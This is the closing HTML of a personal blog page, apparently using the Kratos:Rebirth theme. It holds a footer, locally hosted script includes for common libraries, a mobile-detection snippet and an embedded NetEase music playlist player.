                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
    </div>
</footer>
</div>
</div>

        <script defer src="/vendors/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="/vendors/nprogress@0.2.0/nprogress.js"></script>
<script>
    if (!window.kr) {
        window.kr = {};
    }
    window.kr.notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));
    window.kr.siteRoot = "/";
</script>


    <script async src="/js/candy.min.js"></script>



    <script defer src="/vendors/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="/vendors/meting@2.0.1/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="3204190542"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="/vendors/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>



<!-- Extra support for third-party plguins  -->


    </body>
</html>